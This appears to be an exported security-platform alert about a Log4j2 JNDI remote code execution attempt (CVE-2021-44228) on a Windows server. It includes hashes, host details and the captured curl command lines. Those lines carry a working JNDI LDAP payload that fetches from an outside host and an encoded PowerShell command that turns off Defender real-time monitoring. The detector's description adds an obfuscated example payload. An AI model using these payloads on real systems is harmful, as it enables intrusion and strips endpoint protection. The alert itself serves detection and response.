Apache Log4j2 (JNDI) Remote Code Execution 3
Is this alert valuable?
Details
This alert title has been seen 1 times in the last 7 days across Smiths Cogwheels, Inc.
Status:
Status Reason:
None
First Activity:
2024/02/18 12:49:23 UTC (a month ago)
Last Activity:
2024/02/18 12:57:11 UTC (a month ago)
Inserted At:
2024/02/18 12:57:04 UTC (a month ago)
Severity:
High (0.75)
Threat Score:
7.5
Tenant:
Detector:
Taegis Watchlist
Tactics:
Initial Access
Techniques:
Sensor Types:
Red Cloak
Confidence:
66%
Username:
Hostname:
Agent/Sensor ID:
Files:
MD5:
SHA1:
Investigations:
This alert has not been added to an investigation.
Occurrence Count:
2
Grouped by (Group Key):
96072:app:event-filter:process:f92ae32a-76c1-47d0-a0f6-5507f3270337:b09b0d11ea98b188bdd2ddc897a73b60:C:\curl\curl.exe:2024-02-14
Affected Agents (1)
Last Updated:
2024/03/31 13:21:57 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
VERSION_SERVER_2016
Most Recent Address:
10.24.22.50
Open alerts (0) for Related Entities
Open alerts within past 72 hours from alert creationNO DATA
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60)
0
Files (cmd.exe +1 more)
0
Hostname (WinServ-DB)
0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2)
0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7)
0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337)
0
Username (WINSERV-DB\Administrator)
0
Closed alerts (69) for Related Entities
Closed alerts within past 30 days from alert creationAgent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60)
0
Files (cmd.exe +1 more)
69
Hostname (WinServ-DB)
0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2)
0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7)
0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337)
0
Username (WINSERV-DB\Administrator)
0
Open or closed investigations (0) for Related Entities
Open or closed investigations within past 30 daysFile Hashes (16fae319be8f1e29b2be6fcd5aad9dc2 +1 more)
0
Files (curl.exe +1 more)
0
Host (b09b0d11ea98b188bdd2ddc897a73b60)
0
User (WINSERV-DB\Administrator)
0
A process event with a command line that features a syntax for a Java Naming and Directory Interface (JNDI) lookup function was identified. This activity may indicate that a threat actor is attempting to execute code associated with a known remote code execution (RCE) vulnerability, CVE-2021-44228.
Example:
> curl -H X-Api-Version: ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
JNDI allows software clients to discover and look up data and objects via a name. A threat actor can store these objects in various naming or directory services, such as Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). An attacker who can control log messages or log message parameters can exploit CVE-2021-44228 to execute arbitrary code loaded from a server (e.g., LDAP) when message lookup substitution is enabled.
External References
Log4j vulnerability CVE-2021-44228 under active exploitation Learn more
GitHub | tangxiaofeng7 / CVE-2021-44228-Apache-Log4j-Rce Learn more
First Event Details
We are showing the First Event Details out of 2 events. If you want to see more, please go to Events tab.
Process
Table
Normalized
Original
Command Line:
curl "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Event Time:
2024/02/18 12:49:23 UTC · a month ago
Ingest Time:
2024/02/18 12:56:55 UTC · a month ago
Process ID:
1856
Image Path:
C:\curl\curl.exe (Admin)
Parent Process ID:
640
Parent Image Path:
C:\Windows\System32\cmd.exe
Username:
WINSERV-DB\Administrator (Admin)
Hostname:
Sensor ID:
b09b0d11ea98b188bdd2ddc897a73b60
Related File Data
File Name:
curl.exe
1 - 2 in 2
2024/02/18 12:49:23 UTC - Source Event
View EventCommand Line:
curl "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:56:55 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1856
Process Create Time:
2024/02/18 12:49:23 UTC (a month ago)
2024/02/18 12:53:01 UTC
View EventCommand Line:
curl "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:57:11 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1928
Process Create Time:
2024/02/18 12:53:01 UTC (a month ago)